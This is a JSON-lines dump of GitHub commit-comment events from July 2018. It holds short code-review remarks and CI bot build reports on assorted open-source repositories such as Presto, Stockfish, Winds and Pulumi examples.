{"id":"7967681596","type":"CommitCommentEvent","actor":{"login":"tschellenbach"},"repo":{"name":"GetStream/Winds"},"payload":{"comment":{"id":29713622,"position":8,"line":113,"path":"api/src/models/article.js","commit_id":"2a4755603a9c6749204eca08b1b793b08fd0a4e9","created_at":"2018-07-15T17:32:59Z","updated_at":"2018-07-15T17:32:59Z","author_association":"MEMBER","body":"For personalization the score alone is enough. For the UI we will need the ids so we can render the deeplink. Here are example urls for Reddit and HNews:\r\n\r\nhttps://www.reddit.com/r/programming/comments/8z1w02/jdbc_improvements_and_convenience_method/\r\nhttps://news.ycombinator.com/item?id=17534923\r\n\r\n@Nekuromento "}},"created_at":"2018-07-15T17:32:59Z"}
{"id":"7967683666","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"nikhil-patare007/Array-Examples"},"payload":{"comment":{"id":29713624,"position":4,"line":4,"path":"ArrayMerge.java","commit_id":"bb9ddf691737c75333fb7e451fe697ae3fe6a440","created_at":"2018-07-15T17:34:45Z","updated_at":"2018-07-15T17:34:45Z","author_association":"NONE","body":"whay size is constant as 4, what i have both array of size 5"}},"created_at":"2018-07-15T17:34:45Z"}
{"id":"7967684229","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"nikhil-patare007/Array-Examples"},"payload":{"comment":{"id":29713626,"position":4,"line":4,"path":"ArrayReverse.java","commit_id":"bb9ddf691737c75333fb7e451fe697ae3fe6a440","created_at":"2018-07-15T17:35:10Z","updated_at":"2018-07-15T17:35:10Z","author_association":"NONE","body":"Again, size as 3"}},"created_at":"2018-07-15T17:35:10Z"}
{"id":"7967684323","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29713627,"position":null,"line":null,"path":null,"commit_id":"268a84a71f47f5621df1cb0c9b0c1c7c7f5c7382","created_at":"2018-07-15T17:35:14Z","updated_at":"2018-07-15T17:35:14Z","author_association":"OWNER","body":"Lmao I'll make u author ;)"}},"created_at":"2018-07-15T17:35:14Z"}
{"id":"7967686040","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"vicky1998/Array"},"payload":{"comment":{"id":29713632,"position":5,"line":5,"path":"ArrEx6.java","commit_id":"2f6b79d92d86a724ba8ab7174eb283c010c2cbe8","created_at":"2018-07-15T17:36:40Z","updated_at":"2018-07-15T17:36:40Z","author_association":"NONE","body":"constant size, 6 it should not be 6"}},"created_at":"2018-07-15T17:36:40Z"}
{"id":"7967686260","type":"CommitCommentEvent","actor":{"login":"tschellenbach"},"repo":{"name":"GetStream/Winds"},"payload":{"comment":{"id":29713635,"position":22,"line":133,"path":"api/src/workers/rss.js","commit_id":"2a4755603a9c6749204eca08b1b793b08fd0a4e9","created_at":"2018-07-15T17:36:49Z","updated_at":"2018-07-15T17:36:49Z","author_association":"MEMBER","body":"Nice i didn't know mongoose supported that @Nekuromento, looks easy to use."}},"created_at":"2018-07-15T17:36:49Z"}
{"id":"7967686775","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"vicky1998/Array"},"payload":{"comment":{"id":29713637,"position":9,"line":9,"path":"ArrEx8.java","commit_id":"2f6b79d92d86a724ba8ab7174eb283c010c2cbe8","created_at":"2018-07-15T17:37:16Z","updated_at":"2018-07-15T17:37:16Z","author_association":"NONE","body":"empty if block , negate it"}},"created_at":"2018-07-15T17:37:16Z"}
{"id":"7967687429","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"vicky1998/Array"},"payload":{"comment":{"id":29713639,"position":5,"line":5,"path":"ArrayEx2.java","commit_id":"2f6b79d92d86a724ba8ab7174eb283c010c2cbe8","created_at":"2018-07-15T17:37:47Z","updated_at":"2018-07-15T17:37:47Z","author_association":"NONE","body":"constant array size 3, will not work for other inputs"}},"created_at":"2018-07-15T17:37:47Z"}
{"id":"7967687481","type":"CommitCommentEvent","actor":{"login":"kumarvivek02"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29713640,"position":3,"line":14,"path":"Vidly/Models/Movie.cs","commit_id":"93f39efe3ef0ce9c25ef09ebef60ad2dfc1fe7f3","created_at":"2018-07-15T17:37:50Z","updated_at":"2018-07-15T17:37:50Z","author_association":"NONE","body":"Isn't Mosh missing the Id property of Movie?"}},"created_at":"2018-07-15T17:37:50Z"}
{"id":"7967688029","type":"CommitCommentEvent","actor":{"login":"tschellenbach"},"repo":{"name":"GetStream/Winds"},"payload":{"comment":{"id":29713641,"position":26,"line":137,"path":"api/src/workers/rss.js","commit_id":"2a4755603a9c6749204eca08b1b793b08fd0a4e9","created_at":"2018-07-15T17:38:15Z","updated_at":"2018-07-15T17:38:15Z","author_association":"MEMBER","body":"What about:\r\n- rate limiting\r\n- updating scores (its possible the article never changes, but the score does change) while optimizing the number of needed API calls.\r\n\r\n@Nekuromento \r\n"}},"created_at":"2018-07-15T17:38:15Z"}
{"id":"7967688852","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713643,"position":4,"line":458,"path":"presto-docs/src/main/sphinx/admin/properties.rst","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T17:38:55Z","updated_at":"2018-07-15T17:38:55Z","author_association":"NONE","body":"`.add-aggregation-for-semijoin`"}},"created_at":"2018-07-15T17:38:55Z"}
{"id":"7967691069","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713650,"position":58,"line":58,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/iterative/rule/AddPartialAggregationBelowSemiJoin.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T17:40:42Z","updated_at":"2018-07-15T17:40:42Z","author_association":"NONE","body":"unnecessary `(` and `)`"}},"created_at":"2018-07-15T17:40:42Z"}
{"id":"7967691543","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713651,"position":40,"line":40,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/iterative/rule/AddPartialAggregationBelowSemiJoin.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T17:41:02Z","updated_at":"2018-07-15T17:41:02Z","author_association":"NONE","body":"please remove this"}},"created_at":"2018-07-15T17:41:02Z"}
{"id":"7967692460","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"vicky1998/Array"},"payload":{"comment":{"id":29713653,"position":5,"line":5,"path":"FooBar.java","commit_id":"2f6b79d92d86a724ba8ab7174eb283c010c2cbe8","created_at":"2018-07-15T17:41:49Z","updated_at":"2018-07-15T17:41:49Z","author_association":"NONE","body":"nice loginc"}},"created_at":"2018-07-15T17:41:49Z"}
{"id":"7967692467","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713654,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-15T17:41:50Z","updated_at":"2018-07-15T17:41:50Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2320 of 2320 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-15T17:41:50Z"}
{"id":"7967693379","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713657,"position":75,"line":75,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/iterative/rule/AddPartialAggregationBelowSemiJoin.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T17:42:30Z","updated_at":"2018-07-15T17:42:30Z","author_association":"NONE","body":"PARTIAL"}},"created_at":"2018-07-15T17:42:30Z"}
{"id":"7967693601","type":"CommitCommentEvent","actor":{"login":"YanLiang1102"},"repo":{"name":"oudalab/co-incidents"},"payload":{"comment":{"id":29713659,"position":6,"line":805,"path":"sourceCode/co_yan.cpp","commit_id":"f814d79f52804d6867749eac2e42d38c65f92032","created_at":"2018-07-15T17:42:42Z","updated_at":"2018-07-15T17:42:42Z","author_association":"COLLABORATOR","body":"since generatedRandomInteger include the leftBound and rightBound"}},"created_at":"2018-07-15T17:42:42Z"}
{"id":"7967694003","type":"CommitCommentEvent","actor":{"login":"bturner"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29713663,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-15T17:43:03Z","updated_at":"2018-07-15T17:43:03Z","author_association":"CONTRIBUTOR","body":"I must have been half-asleep at the keyboard yesterday, because the issue is actually pretty obvious today.\r\n\r\n```c\r\n#ifdef __x86_64__\r\n#define EPOLL_PACKED __attribute__((packed))\r\n#else\r\n#define EPOLL_PACKED\r\n#endif\r\n```\r\n\r\nNaturally, `__x86_64__` won't be defined on ARM, or ARM64, so it builds without `__attribute__((packed))` on any 64-bit platforms other than x86-64 and gets padded to 16 bytes. I should have thought of it sooner.\r\n\r\nBased on that, it seems like the solution might be to use `ALIGN_GNUC` on any platform other than x86-64, where we'd use `ALIGN_NONE` to match the header file. The obvious risk being that some other platforms have modified `#if` directives and do pack the struct. Thoughts?"}},"created_at":"2018-07-15T17:43:03Z"}
{"id":"7967694236","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713664,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-15T17:43:14Z","updated_at":"2018-07-15T17:43:14Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T17:43:14Z"}
{"id":"7967694280","type":"CommitCommentEvent","actor":{"login":"ayakauleu"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29713665,"position":15,"line":15,"path":"lesson3/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T17:43:16Z","updated_at":"2018-07-15T17:43:16Z","author_association":"OWNER","body":"это total )) ок, все понятно, спасибо "}},"created_at":"2018-07-15T17:43:16Z"}
{"id":"7967694471","type":"CommitCommentEvent","actor":{"login":"Furtif"},"repo":{"name":"Furtif/POGOProtos"},"payload":{"comment":{"id":29713666,"position":null,"line":null,"path":null,"commit_id":"308761f93aa55c09524123608cb6223bdbab1977","created_at":"2018-07-15T17:43:25Z","updated_at":"2018-07-15T17:43:25Z","author_association":"OWNER","body":"https://github.com/Furtif/POGOProtos/blob/master/src/POGOProtos/Settings/Master/GenderSettings.proto\r\n\r\nhttps://github.com/Furtif/POGOProtos/blob/master/src/POGOProtos/Settings/Master/Pokemon/Gender.proto"}},"created_at":"2018-07-15T17:43:25Z"}
{"id":"7967695966","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713668,"position":7,"line":4313,"path":"presto-tests/src/main/java/com/facebook/presto/tests/AbstractTestQueries.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T17:44:41Z","updated_at":"2018-07-15T17:44:41Z","author_association":"NONE","body":"this test does not cover anything. Disregarding your rule exists or not the test will pass. You need low level testing. See how other rules are tested and also see tests like `TestLogicalPlanner` or `TestPredicatePushdown`."}},"created_at":"2018-07-15T17:44:41Z"}
{"id":"7967696328","type":"CommitCommentEvent","actor":{"login":"lzzy12"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29713671,"position":null,"line":null,"path":null,"commit_id":"268a84a71f47f5621df1cb0c9b0c1c7c7f5c7382","created_at":"2018-07-15T17:44:59Z","updated_at":"2018-07-15T17:44:59Z","author_association":"COLLABORATOR","body":"I meant I did not created for joker lmao. Created for my bot...."}},"created_at":"2018-07-15T17:44:59Z"}
{"id":"7967696808","type":"CommitCommentEvent","actor":{"login":"gfontenot"},"repo":{"name":"keith/dotfiles"},"payload":{"comment":{"id":29713672,"position":null,"line":null,"path":null,"commit_id":"5676af1518aa384b957512159c383610ddb265b3","created_at":"2018-07-15T17:45:22Z","updated_at":"2018-07-15T17:45:22Z","author_association":"NONE","body":"Psst: https://github.com/janko-m/vim-test/pull/307"}},"created_at":"2018-07-15T17:45:22Z"}
{"id":"7967697622","type":"CommitCommentEvent","actor":{"login":"Furtif"},"repo":{"name":"Furtif/POGOProtos"},"payload":{"comment":{"id":29713673,"position":null,"line":null,"path":null,"commit_id":"308761f93aa55c09524123608cb6223bdbab1977","created_at":"2018-07-15T17:46:04Z","updated_at":"2018-07-15T17:46:04Z","author_association":"OWNER","body":"have bug yes good"}},"created_at":"2018-07-15T17:46:04Z"}
{"id":"7967698456","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713676,"position":27,"line":64,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFive.cs","commit_id":"f9d67bdde5cf079bead1a7c0b061e650f08c7fce","created_at":"2018-07-15T17:46:45Z","updated_at":"2018-07-15T17:46:45Z","author_association":"COLLABORATOR","body":"Чот не уверен, что решение правильное. Напиши тесты, чтоб проверить."}},"created_at":"2018-07-15T17:46:45Z"}
{"id":"7967700278","type":"CommitCommentEvent","actor":{"login":"erkinalp"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29713678,"position":763,"line":850,"path":"boot/freeldr/freeldr/lib/fs/btrfs.c","commit_id":"61d2c58640635b7786d62199ec5fdd08d6a71c3c","created_at":"2018-07-15T17:48:19Z","updated_at":"2018-07-15T17:48:19Z","author_association":"NONE","body":"Hermes: See my comment below."}},"created_at":"2018-07-15T17:48:19Z"}
{"id":"7967702097","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29713681,"position":null,"line":null,"path":null,"commit_id":"329d8993eb5fffc3ed3122513b86b9004606c843","created_at":"2018-07-15T17:49:55Z","updated_at":"2018-07-15T17:49:55Z","author_association":"CONTRIBUTOR","body":"@Destiny609 Bien. Aunque no deberá ser \"cuidar\" "}},"created_at":"2018-07-15T17:49:55Z"}
{"id":"7967703762","type":"CommitCommentEvent","actor":{"login":"omor1"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29713687,"position":null,"line":null,"path":null,"commit_id":"14ae8b052252e4a3073429e4a945e471f0079dc6","created_at":"2018-07-15T17:51:08Z","updated_at":"2018-07-15T17:51:08Z","author_association":"NONE","body":"I think the question was more whether the cluster Stockfish with 2 MPI processes, each with 2 threads, performs better than regular Stockfish with 2 threads. My initial testing showed very poor performance of the cluster branch, but there were a number of bugs with it at the time (wrong PV, bad time management) which, to my understanding, have since been solved, so it warrants re-testing (preferably after rebasing on top of master).\r\n\r\nIf this still demonstrates worse performance than we can try figuring out a better TT entry distribution algorithm (the current one simply does a nonblocking allgather). The algorithm presented in Peter Österlund's initial Lazy Cluster algorithm does a better job of scaling to the network bandwidth/latency versus computation ratio, but has some implementation difficulties in Stockfish (due to its different design as compared to Texel)."}},"created_at":"2018-07-15T17:51:08Z"}
{"id":"7967704759","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29713690,"position":17,"line":44,"path":"update.xml","commit_id":"c0694bfc2abe9a76323835389c9a8693c9d70933","created_at":"2018-07-15T17:51:55Z","updated_at":"2018-07-15T17:51:55Z","author_association":"MEMBER","body":"additional spaces after >"}},"created_at":"2018-07-15T17:51:55Z"}
{"id":"7967704882","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713692,"position":19,"line":56,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFive.cs","commit_id":"f9d67bdde5cf079bead1a7c0b061e650f08c7fce","created_at":"2018-07-15T17:52:01Z","updated_at":"2018-07-15T17:52:01Z","author_association":"COLLABORATOR","body":"Того же самого можно достичь, если сделать два последовательных цикла - первый пробегает по всем участникам, стартовавшим раньше текущего, а второй по всем участникам, стартовавшем позже текущего.\r\nТак читается лучше. Плюс оптимальнее, так как на каждой итерации не надо будет сравнивать i и j. Но, конечно, оптимизация - это менее важный момент."}},"created_at":"2018-07-15T17:52:01Z"}
{"id":"7967706324","type":"CommitCommentEvent","actor":{"login":"hyperpress"},"repo":{"name":"hyperpress/aocc"},"payload":{"comment":{"id":29713694,"position":null,"line":null,"path":null,"commit_id":"ed1271b86be6235d786c10d2cc8b2fe818df4543","created_at":"2018-07-15T17:53:14Z","updated_at":"2018-07-15T17:53:14Z","author_association":"OWNER","body":"Added Germand and Dutch translations"}},"created_at":"2018-07-15T17:53:14Z"}
{"id":"7967706409","type":"CommitCommentEvent","actor":{"login":"Furtif"},"repo":{"name":"Furtif/POGOProtos"},"payload":{"comment":{"id":29713695,"position":null,"line":null,"path":null,"commit_id":"308761f93aa55c09524123608cb6223bdbab1977","created_at":"2018-07-15T17:53:18Z","updated_at":"2018-07-15T17:53:18Z","author_association":"OWNER","body":"https://github.com/Furtif/POGOProtos/commit/a44fa1ce2f10b4a84adea5fe188d16f4bd562504\r\n"}},"created_at":"2018-07-15T17:53:18Z"}
{"id":"7967706466","type":"CommitCommentEvent","actor":{"login":"fxia22"},"repo":{"name":"StanfordVL/GibsonEnv"},"payload":{"comment":{"id":29713696,"position":5,"line":236,"path":"gibson/core/channels/depth_render/render.cpp","commit_id":"9c16d63a222e6ac89c6aa51c09b5e08bd8fed2b0","created_at":"2018-07-15T17:53:21Z","updated_at":"2018-07-15T17:53:21Z","author_association":"COLLABORATOR","body":"@hzyjerry This needs to be fixed. Also, depth scale factor seems to make the visualization hard to parse?"}},"created_at":"2018-07-15T17:53:21Z"}
{"id":"7967709107","type":"CommitCommentEvent","actor":{"login":"lukehoban"},"repo":{"name":"pulumi/examples"},"payload":{"comment":{"id":29713699,"position":83,"line":82,"path":"cloud-js-thumbnailer-machine-learning/machinelearning.js","commit_id":"174850d8fd250d1766ae7a42eee1ed0601d15933","created_at":"2018-07-15T17:55:34Z","updated_at":"2018-07-15T17:55:34Z","author_association":"MEMBER","body":"Why move the deployment time require of `@pulumi/aws` here?"}},"created_at":"2018-07-15T17:55:34Z"}
{"id":"7967710992","type":"CommitCommentEvent","actor":{"login":"joeduffy"},"repo":{"name":"pulumi/examples"},"payload":{"comment":{"id":29713702,"position":83,"line":82,"path":"cloud-js-thumbnailer-machine-learning/machinelearning.js","commit_id":"174850d8fd250d1766ae7a42eee1ed0601d15933","created_at":"2018-07-15T17:57:12Z","updated_at":"2018-07-15T17:57:12Z","author_association":"MEMBER","body":"I'm not planning to push this to master, this is just a private branch. (Although we may want to take many of these changes.) This is for demos, where I want to drive home \"if you target the cloud package, it runs anywhere\" -- which seeing AWS in the first two lines kind of defeats immediately before even getting into the details."}},"created_at":"2018-07-15T17:57:12Z"}
{"id":"7967712133","type":"CommitCommentEvent","actor":{"login":"Oredna"},"repo":{"name":"aamirsayid/Prawo"},"payload":{"comment":{"id":29713703,"position":null,"line":null,"path":null,"commit_id":"a87b61c3cad2c77604446181d0b8cabb2913414a","created_at":"2018-07-15T17:58:04Z","updated_at":"2018-07-15T17:58:04Z","author_association":"NONE","body":"In the current version of the code, no new documents can be added. By adding only this line, the problem is resolved"}},"created_at":"2018-07-15T17:58:04Z"}
{"id":"7967712151","type":"CommitCommentEvent","actor":{"login":"joeduffy"},"repo":{"name":"pulumi/examples"},"payload":{"comment":{"id":29713704,"position":83,"line":82,"path":"cloud-js-thumbnailer-machine-learning/machinelearning.js","commit_id":"174850d8fd250d1766ae7a42eee1ed0601d15933","created_at":"2018-07-15T17:58:05Z","updated_at":"2018-07-15T17:58:05Z","author_association":"MEMBER","body":"P. S.  It would also be nice if I could just use @pulumi/cloud, and not cloud-aws, but because we don't expose any way to get the underlying name from the cloud package, you need the downcasted type."}},"created_at":"2018-07-15T17:58:05Z"}
{"id":"7967714546","type":"CommitCommentEvent","actor":{"login":"opxarch"},"repo":{"name":"opxarch/OpenDSIM"},"payload":{"comment":{"id":29713709,"position":null,"line":null,"path":null,"commit_id":"5481a40ff17bfc299a3fc10f27b48d3ef9e9cac7","created_at":"2018-07-15T17:59:54Z","updated_at":"2018-07-15T17:59:54Z","author_association":"OWNER","body":"Makefile是从我之前的项目webradio和openwsp迁移而来，所以注释中存在残留信息。待清理。"}},"created_at":"2018-07-15T17:59:54Z"}
{"id":"7967715553","type":"CommitCommentEvent","actor":{"login":"HakozakiSerika"},"repo":{"name":"AioiLight/TJAPlayer3"},"payload":{"comment":{"id":29713721,"position":null,"line":null,"path":null,"commit_id":"76c61e307d0b5b3c3118bf9d87edb19907e17ad5","created_at":"2018-07-15T18:00:33Z","updated_at":"2018-07-15T18:00:33Z","author_association":"NONE","body":"オート時の飛んでいく音符の位置調整"}},"created_at":"2018-07-15T18:00:33Z"}
{"id":"7967718431","type":"CommitCommentEvent","actor":{"login":"a1678991"},"repo":{"name":"ShanuMaurya/Discord-SelfBot-1"},"payload":{"comment":{"id":29713726,"position":null,"line":null,"path":null,"commit_id":"133f0a5b482114ab92606ffe5cd0d89224ed5e4d","created_at":"2018-07-15T18:02:42Z","updated_at":"2018-07-15T18:02:42Z","author_association":"NONE","body":"Publishing the API key to GitHub is crazy."}},"created_at":"2018-07-15T18:02:42Z"}
{"id":"7967718733","type":"CommitCommentEvent","actor":{"login":"syberant"},"repo":{"name":"splintah/game-of-life"},"payload":{"comment":{"id":29713727,"position":null,"line":null,"path":null,"commit_id":"46080ad50c88820a8d7462fa38055ba274f2e194","created_at":"2018-07-15T18:02:53Z","updated_at":"2018-07-15T18:02:53Z","author_association":"COLLABORATOR","body":"> If that is true (I believe it is, but don't know for sure)\r\n\r\nI don't know every format myself but I do know a few, I will provide examples for the normal rule (Birth: 3, Survival 2 & 3):\r\n\r\nRLE (**NOTE:** several possibilities):\r\n```\r\n#r 23/3\r\nx = m, y = n, rule = B3/S23\r\n```\r\n\r\nLife 1.05:\r\n```\r\n#R 23/3\r\n```\r\n\r\nThese examples don't encode exactly the same way but do use the numbers these methods provided.\r\nI thought it might be a good idea to not have to write that code several times and create a function for it...\r\nI do still think it should be in a function but the name didn't quite fit, what do you think? Write this code again for Life 1.05 and future formats?"}},"created_at":"2018-07-15T18:02:53Z"}
{"id":"7967722429","type":"CommitCommentEvent","actor":{"login":"naggie"},"repo":{"name":"naggie/sd01"},"payload":{"comment":{"id":29713731,"position":null,"line":null,"path":null,"commit_id":"77b7ec831dfbf79de2c1325bca738adb3669ccbb","created_at":"2018-07-15T18:05:46Z","updated_at":"2018-07-15T18:05:46Z","author_association":"OWNER","body":"I think, as you suggest, the debug flag is the best option. Now implementing."}},"created_at":"2018-07-15T18:05:46Z"}
{"id":"7967724974","type":"CommitCommentEvent","actor":{"login":"ShawnCZek"},"repo":{"name":"ShawnCZek/TruckersVTC"},"payload":{"comment":{"id":29713735,"position":null,"line":null,"path":null,"commit_id":"2d0bec0400a1410f1cccf1487b7678988a44b654","created_at":"2018-07-15T18:07:41Z","updated_at":"2018-07-15T18:07:41Z","author_association":"OWNER","body":"And now only JavaScript for the deleting button in the table for roles must be done!"}},"created_at":"2018-07-15T18:07:41Z"}
{"id":"7967725117","type":"CommitCommentEvent","actor":{"login":"LutzB1"},"repo":{"name":"LutzB1/hello_world"},"payload":{"comment":{"id":29713736,"position":3,"line":2,"path":"README.md","commit_id":"967938507da5928f55ed2b7f020ca26aa1fd4697","created_at":"2018-07-15T18:07:48Z","updated_at":"2018-07-15T18:07:48Z","author_association":"OWNER","body":"update 1st branch"}},"created_at":"2018-07-15T18:07:48Z"}
{"id":"7967725303","type":"CommitCommentEvent","actor":{"login":"ghostrider-reborn"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29713737,"position":null,"line":null,"path":null,"commit_id":"23d00e79a73f276079bac52645dfbf371e1259c5","created_at":"2018-07-15T18:07:57Z","updated_at":"2018-07-15T18:07:57Z","author_association":"MEMBER","body":"@teamraw leaving github and deleting your account is something you already did LOL when I exposed your kanging skills\r\n\r\nAnd its clearly evident you're angry over the fact that I revealed your truth in your sacred AEX thread in YU forums\r\n\r\nPlease try to speak in English from next time, kind sir."}},"created_at":"2018-07-15T18:07:57Z"}
{"id":"7967725374","type":"CommitCommentEvent","actor":{"login":"yegorich"},"repo":{"name":"MrKevinWeiss/Testing"},"payload":{"comment":{"id":29713738,"position":47,"line":47,"path":"code_gen/code_gen.py","commit_id":"e678c92324f630efa522fcf984fd4614d605085e","created_at":"2018-07-15T18:08:00Z","updated_at":"2018-07-15T18:08:00Z","author_association":"COLLABORATOR","body":"Why not using `with open()` for all file operations?"}},"created_at":"2018-07-15T18:08:00Z"}
{"id":"7967725742","type":"CommitCommentEvent","actor":{"login":"naggie"},"repo":{"name":"naggie/sd01"},"payload":{"comment":{"id":29713739,"position":null,"line":null,"path":null,"commit_id":"77b7ec831dfbf79de2c1325bca738adb3669ccbb","created_at":"2018-07-15T18:08:18Z","updated_at":"2018-07-15T18:08:18Z","author_association":"OWNER","body":"I've implemented it as a public boolean -- is this idiomatic? I see no downsides or significant race conditions."}},"created_at":"2018-07-15T18:08:18Z"}
{"id":"7967727518","type":"CommitCommentEvent","actor":{"login":"LutzB1"},"repo":{"name":"LutzB1/hello_world"},"payload":{"comment":{"id":29713745,"position":null,"line":null,"path":null,"commit_id":"967938507da5928f55ed2b7f020ca26aa1fd4697","created_at":"2018-07-15T18:09:41Z","updated_at":"2018-07-15T18:09:41Z","author_association":"OWNER","body":"1st Reply"}},"created_at":"2018-07-15T18:09:41Z"}
{"id":"7967730340","type":"CommitCommentEvent","actor":{"login":"LutzB1"},"repo":{"name":"LutzB1/hello_world"},"payload":{"comment":{"id":29713748,"position":null,"line":null,"path":null,"commit_id":"967938507da5928f55ed2b7f020ca26aa1fd4697","created_at":"2018-07-15T18:11:47Z","updated_at":"2018-07-15T18:11:47Z","author_association":"OWNER","body":"2nd Reply"}},"created_at":"2018-07-15T18:11:47Z"}
{"id":"7967730660","type":"CommitCommentEvent","actor":{"login":"SSHrmrf"},"repo":{"name":"SSHrmrf/wallpapers"},"payload":{"comment":{"id":29713749,"position":null,"line":null,"path":null,"commit_id":"9fe11424c7bd4581fcceebaaa56dd62f226eb0d4","created_at":"2018-07-15T18:12:01Z","updated_at":"2018-07-15T18:12:01Z","author_association":"OWNER","body":"![serpent rouge](https://user-images.githubusercontent.com/34134953/42736730-4d4c0d12-886b-11e8-9be7-eb6d8608f243.jpg)\r\n"}},"created_at":"2018-07-15T18:12:01Z"}
{"id":"7967733342","type":"CommitCommentEvent","actor":{"login":"sayantanHack"},"repo":{"name":"sayantanHack/my-first-repository"},"payload":{"comment":{"id":29713751,"position":1,"line":6,"path":"README.md","commit_id":"916c0cce4f0f347e540928eead898404134c1aac","created_at":"2018-07-15T18:14:02Z","updated_at":"2018-07-15T18:14:02Z","author_association":"OWNER","body":"repo not reop"}},"created_at":"2018-07-15T18:14:02Z"}
{"id":"7967733682","type":"CommitCommentEvent","actor":{"login":"limmweb"},"repo":{"name":"limmweb/protocol"},"payload":{"comment":{"id":29713754,"position":16,"line":37,"path":"contracts/TESTING.md","commit_id":"78fd321d8939b0f058327999823470e010dffd51","created_at":"2018-07-15T18:14:19Z","updated_at":"2018-07-15T18:14:19Z","author_association":"OWNER","body":"Send 10 ETH from account \"0\" to account \"1\". Showing invoice."}},"created_at":"2018-07-15T18:14:19Z"}
